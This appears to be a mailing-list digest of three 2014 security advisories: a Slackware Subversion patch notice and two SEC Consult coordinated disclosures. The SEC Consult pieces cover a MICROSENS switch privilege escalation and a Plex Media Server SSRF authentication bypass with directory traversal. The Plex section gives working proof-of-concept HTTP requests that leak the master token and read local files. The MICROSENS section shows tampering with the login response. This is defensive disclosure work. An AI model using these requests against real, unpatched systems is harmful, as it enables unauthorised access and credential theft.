[slackware-security] subversion (SSA:2014-058-01)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [slackware-security] subversion (SSA:2014-058-01) New subversion packages are available for Slackware 14.0, 14.1, and -current to fix denial-of-service issues. Here are the details from the Slackware 14.1 ChangeLog: +--+ patches/packages/subversion-1.7.16-i486-1_slack14.1.txz: Upgraded. Fix denial of service bugs. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4505 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4558 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0032 (* Security fix *) +--+ Where to find the new packages: +-+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the Get Slack section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/subversion-1.7.16-i486-1_slack14.0.txz Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/subversion-1.7.16-x86_64-1_slack14.0.txz Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/subversion-1.7.16-i486-1_slack14.1.txz Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/subversion-1.7.16-x86_64-1_slack14.1.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/d/subversion-1.7.16-i486-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/d/subversion-1.7.16-x86_64-1.txz MD5 signatures: +-+ Slackware 14.0 package: c4699bf909ffea74d50312f5298ad6ac subversion-1.7.16-i486-1_slack14.0.txz Slackware x86_64 14.0 package: 98c8987ecdd325400c7e2f0911367849 subversion-1.7.16-x86_64-1_slack14.0.txz Slackware 14.1 package: 8525945c41a811583f4d95cadc6999d8 subversion-1.7.16-i486-1_slack14.1.txz Slackware x86_64 14.1 package: 42ceb10a1df6173d6d840f68d19db5e2 subversion-1.7.16-x86_64-1_slack14.1.txz Slackware -current package: 76a1890cb04f569b5eaf40da013a037e d/subversion-1.7.16-i486-1.txz Slackware x86_64 -current package: acdcd32e29e311059e8f2f1e383bf35b d/subversion-1.7.16-x86_64-1.txz Installation instructions: ++ Upgrade the package as root: # upgradepkg subversion-1.7.16-i486-1_slack14.1.txz +-+ Slackware Linux Security Team http://slackware.com/gpg-key secur...@slackware.com ++ | To leave the slackware-security mailing list: | ++ | Send an email to majord...@slackware.com with this text in the body of | | the email message: | || | unsubscribe slackware-security | || | You will get a confirmation message back containing instructions to| | complete the process. Please do not reply to this email address. | ++ -BEGIN PGP SIGNATURE- Version: GnuPG v1 iEYEARECAAYFAlMPpxYACgkQakRjwEAQIjPt0QCfYWcNOcU3XxIhumk8+VobYwws 0h4AoIk5DlSZ0AHHX/hs2hIsAxRIRCGu =ctwH -END PGP SIGNATURE-
SEC Consult SA-20140228-0 :: Privilege escalation vulnerability in MICROSENS Profi Line Modular Industrial Switch
SEC Consult Vulnerability Lab Security Advisory 20140228-0 === title: Privilege escalation vulnerability product: MICROSENS Profi Line Modular Industrial Switch Web Manager (MS652119PM) vulnerable version: Firmware version 10.3.1 fixed version: Firmware version 10.3.2 impact: High homepage: http://www.microsens.com/profi-line-modular/ found: 2013-08-21 by: Christian Kudera, Stefan Riegler SEC Consult Vulnerability Lab https://www.sec-consult.com === Vendor description: --- The new Profi Line Modular switches, from MICROSENS, offer maximum performance and flexibility in smallest spaces. Robust, modular, expandable and designed for greatest reliability and shortest recovery times, the Profi Line Modular series has become the first-choice solution for Industrial Ethernet. Source: http://www.microsens.com/profi-line-modular/ Business recommendation: SEC Consult has identified a privilege escalation in the MICROSENS Web Manager in the course of a very limited infrastructure audit. Very little time was spent on the affected product. The Web Manager can be used with read only permission to check the configuration on the device (e.g. VLANs, Port status). Additionally the Web Manager can be used with read and write permission to configure the device. Using the identified vulnerability a low privileged user having read only permission can elevate his privileges to contain read and write permissions. Vulnerability overview/description: --- The Web Manager contains a login form to authenticate a user. The Web Manager offers different levels of privilege (e.g. read only permission, read and write permission, debugging permission). The login attempt is checked through a CGI binary, but the response of the binary is validated at the client side via JavaScript. An attacker can intercept and modify the response of the binary, thus achieving authentication and the desired level of authorization. No further validation is performed by the Web Manager. Proof of concept: - The login generates the following request to the server: interf=WEBbidx=1unam=rootpawo=plev=0 This request triggers a CGI binary, which validates the login attempt and returns the following response: xml !-- last change: 17.04.2012 -- !-- returned at uptime of 141056 seconds -- header versionV0.1/version userXYZ/user date2012/05/29 17:28:00/date /header response par name=cmd type=STRING vallogin/val /par par name=result type=UNSIGNED val255/val /par par name=lunam type=STRING valroot/val /par par name=liid type=STRING val0/val /par par name=rhost type=STRING val192.10.100.136/val /par par name=a_s_b type=STRING val0_0_1/val /par /response /xml The parameter result informs the client about the properness of the provided login credentials. The parameter can correspond to the following values: 255 login failed 1 login with read only permission 2 login with read and write permission 3 login with debugging permission For example, if the value of the parameter result is changed to 3, the user gets logged in with debugging permissions. Vendor contact timeline: 2013-09-10: Contacting vendor 2013-09-11: Sending advisory and proof of concept exploit via encrypted channel. 2013-09-11: Vendor acknowledges receipt of advisory. 2013-10-18: Vendor responds and wants to release update on 2013-10-31. 2013-10-31: MICROSENS releases fixed version. 2014-02-07: Conference call: Clarifying pending questions regarding the fixed version. 2014-02-28: SEC Consult releases coordinated security advisory. Solution: - Update to the most recent firmware version 10.3.2 Workaround: --- All accounts with read only permissions should be disabled on the device. Advisory URL: - https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested in working with the experts of SEC Consult? Write to car...@sec-consult.com
SEC Consult SA-20140228-1 :: Authentication bypass (SSRF) and local file disclosure in Plex Media Server
SEC Consult Vulnerability Lab Security Advisory 20140228-1 === title: Authentication bypass (SSRF) and local file disclosure product: Plex Media Server vulnerable version: =0.9.9.2.374-aa23a69 fixed version: =0.9.9.3 impact: Critical homepage: http://www.plex.tv found: 2014-02-06 by: Stefan Viehböck SEC Consult Vulnerability Lab https://www.sec-consult.com === Vendor/product description: - Plex is a media player system consisting of a player application with a 10-foot user interface and an associated media server. It is available for Mac OS X, Linux, and Microsoft Windows. URL: https://en.wikipedia.org/wiki/Plex_(software) Vulnerability overview/description: --- 1. Authentication bypass / Server Side Request Forgery (SSRF) The Plex Media Server /system/proxy functionality fails to properly validate pre-authentication user requests. This allows unauthenticated attackers to make the Plex Media Server execute arbitrary HTTP requests. By requesting content from 127.0.0.1 an attacker can bypass all authentication and execute commands with administrative privileges. 2. Unauthenticated local file disclosure Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed. Plex Remote servers (thousands of them can be found via Shodan and Google, none of them were accessed) are affected by both vulnerabilities as well. Proof of concept: - 1. Authentication bypass / Server Side Request Forgery (SSRF) The following GET request bypasses the webserver whitelist. GET /system/proxy HTTP/1.1 Host: PLEX_WAN_HOST X-Plex-Url: http://localhost:32400/myplex/account?IRRELEVANT= X-Plex-Url: http://my.plexapp.com/ The last X-Plex-Url header value http://my.plexapp.com/; is contained in the whitelist (Regex) and passes validation. The request is then processed by the actual request handler in the backend webserver (Python). Here both header values are concatenated using a comma. This way the actual URL that is requested is controlled by the first X-Plex-Url value. By indicating a parameter (called IRRELEVANT) the second X-Plex-Url value is dissolved. This results in the following request (made by Plex Media Server): GET /myplex/account?IRRELEVANT=,http://my.plexapp.com/ HTTP/1.1 Host: localhost:32400 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.2b4) Gecko/20091124 Firefox/3.6b4 (.NET CLR 3.5.30729) Connection: close Accept: */* Accept-Encoding: gzip The response for this request is passed to the attacker and includes the authToken value (master token), which can be used to impersonate legitimate Plex users. Of course other administrative actions can be performed as well. ?xml version=1.0 encoding=UTF-8? MyPlex authToken=REMOVED username=REMOVED mappingState=mapped mappingError= mappingErrorMessage=1 signInState=ok publicAddress=1 publicPort=9415 privateAddress=1 privatePort=32400 subscriptionFeatures=cloudsync,pass,sync subscriptionActive=1 subscriptionState=Active /MyPlex A video demonstrating this issue has been released by SEC Consult: http://www.youtube.com/watch?v=f99fm4QU9u8 2. Unauthenticated local file disclosure The following requests show different functionality that is vulnerable to directory traversal: GET /manage/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1 Host: HOST GET /web/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1 Host: HOST GET /:/resources/..\..\..\..\..\..\..\..\..\..\secret.txt HTTP/1.1 Host: HOST The /manage/ and /web/ handlers can be exploited without prior authentication. This vulnerability was confirmed on Windows. Vulnerable / tested versions: - The vulnerabilities have been verified to exist in Plex Media Server version 0.9.9.2.374-aa23a69. Vendor contact timeline: 2014-02-09: Contacting vendor through e...@plexapp.com and requesting encryption keys. 2014-02-10: Vendor provides encryption keys. 2014-02-10: Sending advisory and proof of concept exploit. 2014-02-10: Vendor acknowledges receipt of advisory. 2014-02-17: Requesting status update. 2014-02-17: Vendor provides release timeline. 2014-02-20: Vendor releases fixed version (0.9.9.3). 2014-02-21: Requesting clarification regarding fixed version. 2014-02-21: Vendors provides further information about fixed version and other reported vulnerabilities. 2014-02-28: SEC Consult releases coordinated security advisory. Solution: - Update to a more recent version of Plex Media Server (eg. 0.9.9.5). Workaround: --- No workaround available. Advisory URL